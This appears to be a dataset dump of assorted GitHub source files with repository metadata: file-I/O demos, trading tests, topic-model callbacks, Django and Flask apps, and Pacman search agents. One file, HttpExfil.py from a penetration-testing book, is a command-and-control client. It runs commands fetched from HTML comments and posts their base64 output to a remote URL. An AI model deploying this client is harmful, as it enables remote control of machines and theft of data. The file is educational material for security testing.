blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
05c42897a43ef1cd339385cd1d08994c838bd27a
|
454de23b97631718c7c7795fdef14881e5758d22
|
/Unit 3/fileIO.py
|
f523092c0042ed435999e78fc9b1e02607f2f1cd
|
[] |
no_license
|
dhruv3/IntroToPython
|
0ac7ab132abd89eb99e86dd62ccc884f454d2701
|
620d05269f33a1f8003986af87cb956b217359ec
|
refs/heads/master
| 2021-01-22T05:43:18.095945
| 2017-05-18T13:30:35
| 2017-05-18T13:30:35
| 81,695,504
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 706
|
py
|
#
# File I/O demo: two ways to read a text file, and one way to copy one.
#
# Method 1: explicit open()/close().
infile = 'testTextFile.txt'
f = open(infile, 'r')
data = f.read()
f.close()
print(data)
# len() gives the total number of characters in the string `data`.
print(len(data))
# Clean the data: strip quotes, then split on comma-space into a list.
data = data.replace('"', '')
dataList = data.split(', ')
print(dataList)
print(len(dataList))
# Method 2: a context manager closes the file automatically, even on error.
with open("testNum.txt", "r") as f:
    for line in f:
        print(line)
# Write to a file. Using `with` for BOTH files guarantees the output file
# is flushed and closed even if an exception occurs mid-copy (the original
# left `of` open on error).
with open("newOPFile.txt", "w") as of, open("testNum.txt", "r") as f:
    for line in f:
        of.write(line)
# If we don't close, we won't be able to rely on the data reaching the file:
# written data sits in a RAM buffer and is only guaranteed on disk after the
# file is flushed/closed.
|
[
"dhruv.mnit@gmail.com"
] |
dhruv.mnit@gmail.com
|
a722c34d1eb09a9e71cc919a6734cf38c3fe7d9a
|
bcc1f398423b7107dc54b3046fa49029b416fba2
|
/Module 3/Chapter 8/HttpExfil.py
|
9b8d7d24874df32cc0cf0c653201baaea33956cf
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
PacktPublishing/Python-Penetration-Testing-for-Developers
|
d81432bd276366fb606e0d2231956c2770b2952c
|
a712d19c9587d04e13b332adbc3620c0df477c89
|
refs/heads/master
| 2023-02-18T20:10:37.725636
| 2023-01-30T08:36:57
| 2023-01-30T08:36:57
| 68,084,109
| 43
| 37
| null | null | null | null |
WINDOWS-1250
|
Python
| false
| false
| 521
|
py
|
# SECURITY NOTE(review): this is a command-and-control client example from a
# penetration-testing book. It polls a page for commands hidden in HTML
# comments, executes them, and posts the output back. Keep it sandboxed.
import requests
import re
import subprocess
import time
import os
while 1:
    req = requests.get("http://127.0.0.1")
    # Commands are smuggled inside HTML comments on the fetched page.
    comments = re.findall('<!--(.*)-->', req.text)
    for comment in comments:
        if comment == " ":  # fixed: original `if comment = " ":` is a SyntaxError
            # A single-space comment is the kill switch: remove this script.
            os.remove(__file__)  # fixed: os.delete() does not exist in the os module
        else:
            try:
                # Executes the remote command; output is captured for exfil.
                response = subprocess.check_output(comment.split())
            except Exception:  # narrowed from bare `except:` so Ctrl-C still works
                response = "command fail"  # fixed: smart quotes were a SyntaxError
            # NOTE(review): str.encode("base64") is Python 2 only; on Python 3
            # this needs base64.b64encode over bytes — confirm target runtime.
            data = {"comment": (''.join(response)).encode("base64")}
            newreq = requests.post("http://127.0.0.1notmalicious.com/xss/easy/addguestbookc2.php ", data=data)
    time.sleep(30)
|
[
"jayeshs@packtpub.net"
] |
jayeshs@packtpub.net
|
5c9f9ce0e28a0947dd8edbcea57820ca55c76184
|
d3efc82dfa61fb82e47c82d52c838b38b076084c
|
/Autocase_Result/KCB_YCHF/KCB_YCHF_MM/SHOffer/YCHF_KCBYCHF_SHBP_153.py
|
57c5b458804546c0a77bf642879eaa200c682c30
|
[] |
no_license
|
nantongzyg/xtp_test
|
58ce9f328f62a3ea5904e6ed907a169ef2df9258
|
ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f
|
refs/heads/master
| 2022-11-30T08:57:45.345460
| 2020-07-30T01:43:30
| 2020-07-30T01:43:30
| 280,388,441
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,568
|
py
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test//xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test//service")
from ServiceConfig import *
from ARmainservice import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test//mysql")
from CaseParmInsertMysql import *
from SqlData_Transfer import *
sys.path.append("/home/yhl2/workspace/xtp_test//utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
from env_restart import *
class YCHF_KCBYCHF_SHBP_153(xtp_test_case):
    """Functional test: restart the Shanghai quote gateway, then place a
    best-5-or-limit sell order on SH STAR-market ticker 688011 and assert it
    fills completely ('全成')."""
    def setUp(self):
        # Environment-reset helpers are intentionally disabled; re-enable to
        # restore fund/asset state and restart services before the case runs.
        #sql_transfer = SqlData_Transfer()
        #sql_transfer.transfer_fund_asset('YCHF_KCBYCHF_SHBP_153')
        #clear_data_and_restart_all()
        #Api.trade.Logout()
        #Api.trade.Login()
        pass
    #
    def test_YCHF_KCBYCHF_SHBP_153(self):
        """Run the order scenario and compare the service result to case_goal."""
        title = '重启上海报盘(沪A最优五档即成转限价:分笔成交_累积成交金额 >= 手续费 且手续费小于最小值)'
        # Expected values for this test case.
        # Possible order states: initial, unfilled, partially filled, fully
        # filled, partially-cancelled (reported), partially cancelled,
        # reported-pending-cancel, cancelled, rejected, cancel-rejected,
        # internally cancelled.
        # xtp_ID and cancel_xtpID default to 0 and need no change.
        case_goal = {
            '期望状态': '全成',
            'errorID': 0,
            'errorMSG': queryOrderErrorMsg(0),
            '是否生成报单': '是',
            '是否是撤废': '否',
            # '是否是新股申购': '',
            'xtp_ID': 0,
            'cancel_xtpID': 0,
        }
        logger.warning(title)
        # Order request parameters ------------------------------------------
        # Args: ticker, market, security type, security status, trading
        # status, side (B=buy, S=sell), expected status, Api.
        stkparm = QueryStkPriceQty('688011', '1', '4', '2', '0', 'S', case_goal['期望状态'], Api)
        # If fetching the order parameters failed, the case fails here.
        if stkparm['返回结果'] is False:
            rs = {
                '报单测试结果': stkparm['返回结果'],
                '测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
            }
            print(stkparm['错误原因'])
            self.assertEqual(rs['报单测试结果'], True)
        else:
            wt_reqs = {
                'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_CASH'],
                'order_client_id':5,
                'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SH_A'],
                'ticker': stkparm['证券代码'],
                'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
                'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_BEST5_OR_LIMIT'],
                'price': stkparm['涨停价'],
                'quantity': 300,
                'position_effect':Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
            }
            rs = serviceTest(Api, case_goal, wt_reqs)
            logger.warning('执行结果为' + str(rs['报单测试结果']) + ','
                           + str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
        ## Restore available funds (disabled; enable to reset the environment).
        #sql_transfer = SqlData_Transfer()
        #sql_transfer.transfer_fund_asset('YW_KCB_BAK_000')
        #oms_restart()
        self.assertEqual(rs['报单测试结果'], True) # 211
if __name__ == '__main__':
    unittest.main()
|
[
"418033945@qq.com"
] |
418033945@qq.com
|
67036aa7f5e73b06e2cc28232521344169dd679e
|
5006a6965c21e5b828300eedf907eb55ec5b8b27
|
/bnpy/callbacks/CBCalcHeldoutMetricsTopicModel.py
|
57f0d662cfa836d5634ada5bdb6b7f599e3c9e2c
|
[
"BSD-3-Clause"
] |
permissive
|
birlrobotics/bnpy
|
1804d0fed9c3db4c270f4cd6616b30323326f1ec
|
8f297d8f3e4a56088d7755134c329f63a550be9e
|
refs/heads/master
| 2021-07-09T14:36:31.203450
| 2018-02-09T07:16:41
| 2018-02-09T07:16:41
| 96,383,050
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,802
|
py
|
'''
CBCalcHeldoutMetricsTopicModel.py
Learning alg callback extension for fitting topic models on heldout data.
When applied, will perform heldout inference at every parameter-save checkpoint.
Usage
--------
Add the following keyword arg to any call to bnpy.run
--customFuncPath CBCalcHeldoutMetricsTopicModel.py
Example
-------
$ python -m bnpy.Run BarsK10V900 FiniteTopicModel Mult VB \
--K 10 --nLap 50 \
--saveEvery 10 \
--customFuncPath CBCalcHeldoutMetricsTopicModel
Notes
--------
Uses the custom-function interface for learning algorithms.
This interface means that the functions onAlgorithmComplete and onBatchComplete
defined here will be called at appropriate time in *every* learning algorithm.
See LearnAlg.py's eval_custom_function for details.
'''
from __future__ import print_function
import os
import numpy as np
import scipy.io
import InferHeldoutTopics
import HeldoutMetricsLogger
SavedLapSet = set()
def onAlgorithmComplete(**kwargs):
    ''' Runs once, after the learning algorithm finishes.

    Triggers a final heldout evaluation unless the final lap was already
    evaluated by an earlier checkpoint callback.

    Keyword Args
    --------
    All workspace variables passed along from learning alg.
    '''
    finalLap = kwargs['lapFrac']
    alreadyDone = finalLap in SavedLapSet
    if not alreadyDone:
        runHeldoutCallback(**kwargs)
def onBatchComplete(**kwargs):
    ''' Runs heldout evaluation whenever a parameter-save checkpoint is hit.

    On the very first call, resets the module-level SavedLapSet and
    configures the heldout-metrics logger. Each qualifying lap is evaluated
    at most once.

    Keyword Args
    --------
    All workspace variables passed along from learning alg.
    '''
    global SavedLapSet
    learnAlg = kwargs['learnAlg']
    lapFrac = kwargs['lapFrac']
    if kwargs['isInitial']:
        SavedLapSet = set()
        HeldoutMetricsLogger.configure(
            **learnAlg.BNPYRunKwArgs['OutputPrefs'])
    # Skip laps that are not save checkpoints, and laps already processed.
    if not learnAlg.isSaveParamsCheckpoint(lapFrac, kwargs['iterid']):
        return
    if lapFrac in SavedLapSet:
        return
    SavedLapSet.add(lapFrac)
    runHeldoutCallback(**kwargs)
def runHeldoutCallback(**kwargs):
    ''' Evaluate the current model on the heldout validation and test splits.

    Kwargs contain all workspace vars passed from the learning algorithm;
    the ones used here are:

    Keyword Args
    ------------
    learnAlg : provides savedir and elapsed-time bookkeeping
    lapFrac : lap being evaluated

    Returns
    -------
    None. Results are written by InferHeldoutTopics to the task directory.
    '''
    learnAlg = kwargs['learnAlg']
    savedir = learnAlg.savedir
    for splitName in ('validation', 'test'):
        # Elapsed time is re-read per split so each report is current.
        InferHeldoutTopics.evalTopicModelOnTestDataFromTaskpath(
            dataSplitName=splitName,
            taskpath=savedir,
            elapsedTime=learnAlg.get_elapsed_time(),
            queryLap=kwargs['lapFrac'],
            printFunc=HeldoutMetricsLogger.pprint,
            **kwargs)
|
[
"hongminwu0120@gmail.com"
] |
hongminwu0120@gmail.com
|
69991130e0c5ea9538a163c831d2b0caa0fd1571
|
8c5f5cf4ef550062d5511dd848d250b4f54918dd
|
/krishna/settings.py
|
7956897358d0b28eb652179b32ba4c6438fb3f22
|
[] |
no_license
|
krishnagopaldubey/fuzzysearchwithgetmethod
|
af18c9c1834e0a367e1eb3ff5454ea946fb01376
|
116589b684e78e5d0c4f8f05fcd0d83a2ba3e9c6
|
refs/heads/master
| 2020-08-12T06:56:51.493043
| 2019-10-12T20:34:27
| 2019-10-12T20:34:27
| 214,711,316
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,125
|
py
|
"""
Django settings for krishna project.
Generated by 'django-admin startproject' using Django 2.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '&cv==od%vopf$i^i!lces9u1^(303y)0jezopp!3p!6qqsg&*s'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'polls',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'krishna.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'krishna.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
|
[
"krishna@dolphinfoundry.com"
] |
krishna@dolphinfoundry.com
|
f6feb1566f4a0b2b2e1860b1005500bb45004b68
|
79429bd1c124044572bef9d1062d145c01e20b24
|
/ex026.py
|
d7d2e948a9f0c2b06d59b7d78ecec3325b3eb7ee
|
[] |
no_license
|
xxweell/exerciciosPython
|
b6fe00d67a39391bb8794953832f07f7f75eb504
|
93c1ac25dc1d1875c4102e1126fa54a537bb0973
|
refs/heads/master
| 2022-11-14T20:30:13.587004
| 2020-06-17T21:06:59
| 2020-06-17T21:06:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 353
|
py
|
# Read a sentence and report statistics about the letter 'A' (upper() makes
# the count case-insensitive).
texto = str(input('Digite uma frase: ')).strip().upper()
ocorrencias = texto.count('A')
primeira = texto.find('A') + 1   # find() returns the index of the first occurrence
ultima = texto.rfind('A') + 1    # rfind() returns the index of the last occurrence
print('A letra A aparece {} vezes na frase.'.format(ocorrencias))
print('A primeira letra A apareceu na posição {}.'.format(primeira))
print('A última letra A apareceu na posição {}.'.format(ultima))
|
[
"wellingtoncw7@gmail.com"
] |
wellingtoncw7@gmail.com
|
ad3c6e6becb9b5646766ed2063c8d949313bda56
|
aee573c81dc297a97772b99cd90e05d494b25f77
|
/learnpython/matplotlib/demo_plot_2.py
|
e5879a3c9928961f2b12810475ab9a793f96f56e
|
[] |
no_license
|
YuxuanSu-Sean/learning
|
6df9d7b348e3f6c8cad0347e222c1ed244c92332
|
1356b85c2b673925f1fc89ff45f54fb499d342d0
|
refs/heads/master
| 2022-11-13T14:08:17.808037
| 2022-11-10T05:15:16
| 2022-11-10T05:15:16
| 204,625,964
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 82
|
py
|
import matplotlib.pyplot as plt
# Create an empty figure window.
fig = plt.figure()
# Add a single Axes: 1x1 subplot grid, first (and only) cell.
ax1 = fig.add_subplot(111)
|
[
"497572121@qq.com"
] |
497572121@qq.com
|
053950d8dee6b200c63e069154c6d9c6ba7b21af
|
02442f7d3bd75da1b5b1bf6b981cc227906a058c
|
/rocon/build/rocon_app_platform/rocon_app_manager/catkin_generated/pkg.develspace.context.pc.py
|
3de9876b63c7300094cd88e5c7d2b10e59c73d88
|
[] |
no_license
|
facaisdu/RaspRobot
|
b4ff7cee05c70ef849ea4ee946b1995432a376b7
|
e7dd2393cdabe60d08a202aa103f796ec5cd2158
|
refs/heads/master
| 2020-03-20T09:09:28.274814
| 2018-06-14T08:51:46
| 2018-06-14T08:51:46
| 137,329,761
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
# NOTE: machine-generated pkg-config context for the rocon_app_manager
# package; regenerate via catkin rather than editing by hand.
CATKIN_PACKAGE_PREFIX = ""
# Empty-string placeholders mean this package exports no include dirs,
# catkin dependencies, or libraries.
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "rocon_app_manager"
PROJECT_SPACE_DIR = "/home/sclab_robot/turtlebot_ws/rocon/devel"
PROJECT_VERSION = "0.8.0"
|
[
"facai_sdu@126.com"
] |
facai_sdu@126.com
|
998e74d73408d3c5bf3bf99ce5df17a7a52ee3f8
|
0a40a0d63c8fce17f4a686e69073a4b18657b160
|
/test/functional/rpc_bip38.py
|
b70349a25ed83fb3fc00d631b1bc8dcd9eb3f3e4
|
[
"MIT"
] |
permissive
|
MotoAcidic/Cerebellum
|
23f1b8bd4f2170c1ed930eafb3f2dfff07df1c24
|
6aec42007c5b59069048b27db5a8ea1a31ae4085
|
refs/heads/main
| 2023-05-13T06:31:23.481786
| 2021-06-09T15:28:28
| 2021-06-09T15:28:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,025
|
py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2019 The CEREBELLUM developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test RPC commands for BIP38 encrypting and decrypting addresses."""
from test_framework.test_framework import CerebellumTestFramework
from test_framework.util import assert_equal
class Bip38Test(CerebellumTestFramework):
    """Functional test for the bip38encrypt/bip38decrypt RPC pair."""
    def set_test_params(self):
        # Two fresh nodes on a clean chain: node 0 encrypts, node 1 decrypts,
        # proving the BIP38 string is self-contained.
        self.setup_clean_chain = True
        self.num_nodes = 2
    def run_test(self):
        """Encrypt a new address's key on node 0, decrypt it on node 1."""
        password = 'test'
        address = self.nodes[0].getnewaddress()
        # NOTE(review): privkey is fetched but never used below.
        privkey = self.nodes[0].dumpprivkey(address)
        self.log.info('encrypt address %s' % (address))
        # bip38encrypt returns a dict; 'Encrypted Key' holds the BIP38 string.
        bip38key = self.nodes[0].bip38encrypt(address, password)['Encrypted Key']
        self.log.info('decrypt bip38 key %s' % (bip38key))
        # Decrypting on the other node must recover the original address.
        assert_equal(self.nodes[1].bip38decrypt(bip38key, password)['Address'], address)
if __name__ == '__main__':
    Bip38Test().main()
|
[
"travisfinch01@gmail.com"
] |
travisfinch01@gmail.com
|
2bcd1788de6e9a593abedae6ed61b48c43c67654
|
06d6c9346331e392f6d8067eb9ee52d38ae5fab8
|
/carver/pe/setup.py
|
299b8bff264703b5031d4a1ddd6b11e7c4e69e92
|
[
"Apache-2.0"
] |
permissive
|
maydewd/stoq-plugins-public
|
5d5e824dda0c78acab4ff9aef72f567e6b85e555
|
8b2877b5091ae731437ef35a95d4debdbf0a19f3
|
refs/heads/master
| 2020-03-22T18:57:41.061748
| 2018-06-12T14:36:42
| 2018-06-12T14:36:42
| 140,494,475
| 0
| 0
|
Apache-2.0
| 2018-07-10T22:39:08
| 2018-07-10T22:39:08
| null |
UTF-8
|
Python
| false
| false
| 371
|
py
|
from setuptools import setup, find_packages
# Packaging metadata for the stoQ "pe" carver plugin (carves PE files from
# a data stream).
setup(
    name="pe",
    version="0.10",
    author="Jeff Ito, Marcus LaFerrera (@mlaferrera)",
    url="https://github.com/PUNCH-Cyber/stoq-plugins-public",
    license="Apache License 2.0",
    description="Carve portable executable files from a data stream",
    packages=find_packages(),
    include_package_data=True,
)
|
[
"marcus@randomhack.org"
] |
marcus@randomhack.org
|
bb53fe452117f99a8d8f7b1e33f47e1ab79db0c2
|
77b16dcd465b497c22cf3c096fa5c7d887d9b0c2
|
/Cron_Philip/Assignments/flaskolympics/olympics3/server.py
|
3c8cc483f0488a3e80700542e08036210ca2f614
|
[
"MIT"
] |
permissive
|
curest0x1021/Python-Django-Web
|
a7cf8a45e0b924ce23791c18f6a6fb3732c36322
|
6264bc4c90ef1432ba0902c76b567cf3caaae221
|
refs/heads/master
| 2020-04-26T17:14:20.277967
| 2016-10-18T21:54:39
| 2016-10-18T21:54:39
| 173,706,702
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 322
|
py
|
from flask import Flask, render_template, session

app = Flask(__name__)
# NOTE(review): a hard-coded secret key is fine for this demo, but should be
# loaded from config/environment in any real deployment.
app.secret_key = 'ThisIsSecret'


@app.route('/')
def myfirstfunction():
    """Serve the index page, seeding a default session title on first visit."""
    if 'title' not in session:  # idiomatic membership test (was: not 'title' in)
        session['title'] = 'hello world'
    return render_template('index.html', name="Mike")


if __name__ == '__main__':
    app.run(debug=True)
|
[
"43941751+curest0x1021@users.noreply.github.com"
] |
43941751+curest0x1021@users.noreply.github.com
|
973f38ed0345cb23c877e3d788c07856de7093ea
|
aa97a1a30d3f4cc65b80cfbb76ff88f55e96f67b
|
/A-Star-Search/search/searchAgents.py
|
bf0c1649b6b366a5fb4c716f1af59a0f9fa5d13a
|
[] |
no_license
|
yorhaha/AI-Tasks
|
a0df0728ef013fd8053d3ef699b04baa38b931ce
|
6197b9990f997bcf9f3f5ccb6773513670b35ea0
|
refs/heads/main
| 2023-09-03T16:50:48.365762
| 2021-10-30T02:04:13
| 2021-10-30T02:04:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,856
|
py
|
"""
This file contains all of the agents that can be selected to control Pacman. To
select an agent, use the '-p' option when running pacman.py. Arguments can be
passed to your agent using '-a'. For example, to load a SearchAgent that uses
depth first search (dfs), run the following command:
> python pacman.py -p SearchAgent -a fn=depthFirstSearch
Commands to invoke other search strategies can be found in the project
description.
Please only change the parts of the file you are asked to. Look for the lines
that say
"*** YOUR CODE HERE ***"
The parts you fill in start about 3/4 of the way down. Follow the project
description for details.
Good luck and happy searching!
"""
from game import Directions
from game import Agent
from game import Actions
import util
import time
import search
class GoWestAgent(Agent):
    "An agent that goes West until it can't."
    def getAction(self, state):
        "The agent receives a GameState (defined in pacman.py)."
        legal = state.getLegalPacmanActions()
        # Guard-clause form: head West while it remains legal, else stop.
        if Directions.WEST not in legal:
            return Directions.STOP
        return Directions.WEST
#######################################################
# This portion is written for you, but will only work #
# after you fill in parts of search.py #
#######################################################
class SearchAgent(Agent):
    """
    This very general search agent finds a path using a supplied search
    algorithm for a supplied search problem, then returns actions to follow that
    path.
    As a default, this agent runs DFS on a PositionSearchProblem to find
    location (1,1)
    Options for fn include:
      depthFirstSearch or dfs
      breadthFirstSearch or bfs
      aStarSearch or astar
    Note: You should NOT change any code in SearchAgent
    """
    def __init__(self, fn='depthFirstSearch', prob='PositionSearchProblem', heuristic='nullHeuristic'):
        # Warning: some advanced Python magic is employed below to find the right functions and problems
        # Get the search function from the name and heuristic
        if fn not in dir(search):
            raise AttributeError(fn + ' is not a search function in search.py.')
        func = getattr(search, fn)
        # A search function that declares a 'heuristic' parameter gets one
        # bound in; otherwise it is used as-is.
        if 'heuristic' not in func.__code__.co_varnames:
            print('[SearchAgent] using function ' + fn)
            self.searchFunction = func
        else:
            # Heuristic lookup order: this module's globals, then search.py.
            if heuristic in globals().keys():
                heur = globals()[heuristic]
            elif heuristic in dir(search):
                heur = getattr(search, heuristic)
            else:
                raise AttributeError(heuristic + ' is not a function in searchAgents.py or search.py.')
            print('[SearchAgent] using function %s and heuristic %s' % (fn, heuristic))
            # Note: this bit of Python trickery combines the search algorithm and the heuristic
            self.searchFunction = lambda x: func(x, heuristic=heur)
        # Get the search problem type from the name
        if prob not in globals().keys() or not prob.endswith('Problem'):
            raise AttributeError(prob + ' is not a search problem type in SearchAgents.py.')
        self.searchType = globals()[prob]
        print('[SearchAgent] using problem type ' + prob)
    def registerInitialState(self, state):
        """
        This is the first time that the agent sees the layout of the game
        board. Here, we choose a path to the goal. In this phase, the agent
        should compute the path to the goal and store it in a local variable.
        All of the work is done in this method!
        state: a GameState object (pacman.py)
        """
        if self.searchFunction == None: raise Exception("No search function provided for SearchAgent")
        starttime = time.time()
        problem = self.searchType(state) # Makes a new search problem
        self.actions  = self.searchFunction(problem) # Find a path
        totalCost = problem.getCostOfActionSequence(self.actions)
        print('Path found with total cost of %d in %.1f seconds' % (totalCost, time.time() - starttime))
        if '_expanded' in dir(problem): print('Search nodes expanded: %d' % problem._expanded)
    def getAction(self, state):
        """
        Returns the next action in the path chosen earlier (in
        registerInitialState). Return Directions.STOP if there is no further
        action to take.
        state: a GameState object (pacman.py)
        """
        # Lazily initialize the cursor into the precomputed action list.
        if 'actionIndex' not in dir(self): self.actionIndex = 0
        i = self.actionIndex
        self.actionIndex += 1
        if i < len(self.actions):
            return self.actions[i]
        else:
            return Directions.STOP
class PositionSearchProblem(search.SearchProblem):
    """
    A search problem defines the state space, start state, goal test, child
    function and cost function. This search problem can be used to find paths
    to a particular point on the pacman board.
    The state space consists of (x,y) positions in a pacman game.
    Note: this search problem is fully specified; you should NOT change it.
    """
    def __init__(self, gameState, costFn = lambda x: 1, goal=(1,1), start=None, warn=True, visualize=True):
        """
        Stores the start and goal.
        gameState: A GameState object (pacman.py)
        costFn: A function from a search state (tuple) to a non-negative number
        goal: A position in the gameState
        """
        self.walls = gameState.getWalls()
        self.startState = gameState.getPacmanPosition()
        if start != None: self.startState = start
        self.goal = goal
        self.costFn = costFn
        self.visualize = visualize
        if warn and (gameState.getNumFood() != 1 or not gameState.hasFood(*goal)):
            print('Warning: this does not look like a regular search maze')
        # For display purposes
        self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE
    def getStartState(self):
        # Pacman's starting (x, y), or the explicit `start` override.
        return self.startState
    def isGoalState(self, state):
        isGoal = state == self.goal
        # For display purposes only
        if isGoal and self.visualize:
            self._visitedlist.append(state)
            import __main__
            if '_display' in dir(__main__):
                if 'drawExpandedCells' in dir(__main__._display): #@UndefinedVariable
                    __main__._display.drawExpandedCells(self._visitedlist) #@UndefinedVariable
        return isGoal
    def expand(self, state):
        """
        Returns child states, the actions they require, and a cost of 1.
        As noted in search.py:
        For a given state, this should return a list of triples,
        (child, action, stepCost), where 'child' is a
        child to the current state, 'action' is the action
        required to get there, and 'stepCost' is the incremental
        cost of expanding to that child
        """
        children = []
        for action in self.getActions(state):
            nextState = self.getNextState(state, action)
            cost = self.getActionCost(state, action, nextState)
            children.append( ( nextState, action, cost) )
        # Bookkeeping for display purposes
        self._expanded += 1 # DO NOT CHANGE
        if state not in self._visited:
            self._visited[state] = True
            self._visitedlist.append(state)
        return children
    def getActions(self, state):
        # Legal moves are the four compass directions that don't hit a wall.
        possible_directions = [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]
        valid_actions_from_state = []
        for action in possible_directions:
            x, y = state
            dx, dy = Actions.directionToVector(action)
            nextx, nexty = int(x + dx), int(y + dy)
            if not self.walls[nextx][nexty]:
                valid_actions_from_state.append(action)
        return valid_actions_from_state
    def getActionCost(self, state, action, next_state):
        assert next_state == self.getNextState(state, action), (
            "Invalid next state passed to getActionCost().")
        return self.costFn(next_state)
    def getNextState(self, state, action):
        assert action in self.getActions(state), (
            "Invalid action passed to getActionCost().")
        x, y = state
        dx, dy = Actions.directionToVector(action)
        nextx, nexty = int(x + dx), int(y + dy)
        return (nextx, nexty)
    def getCostOfActionSequence(self, actions):
        """
        Returns the cost of a particular sequence of actions. If those actions
        include an illegal move, return 999999.
        """
        if actions == None: return 999999
        x,y= self.getStartState()
        cost = 0
        for action in actions:
            # Check figure out the next state and see whether its' legal
            dx, dy = Actions.directionToVector(action)
            x, y = int(x + dx), int(y + dy)
            if self.walls[x][y]: return 999999
            cost += self.costFn((x,y))
        return cost
def manhattanHeuristic(position, problem, info={}):
    "The Manhattan distance heuristic for a PositionSearchProblem"
    px, py = position
    gx, gy = problem.goal
    return abs(px - gx) + abs(py - gy)
def euclideanHeuristic(position, problem, info={}):
    "The Euclidean distance heuristic for a PositionSearchProblem"
    dx = position[0] - problem.goal[0]
    dy = position[1] - problem.goal[1]
    return (dx ** 2 + dy ** 2) ** 0.5
#####################################################
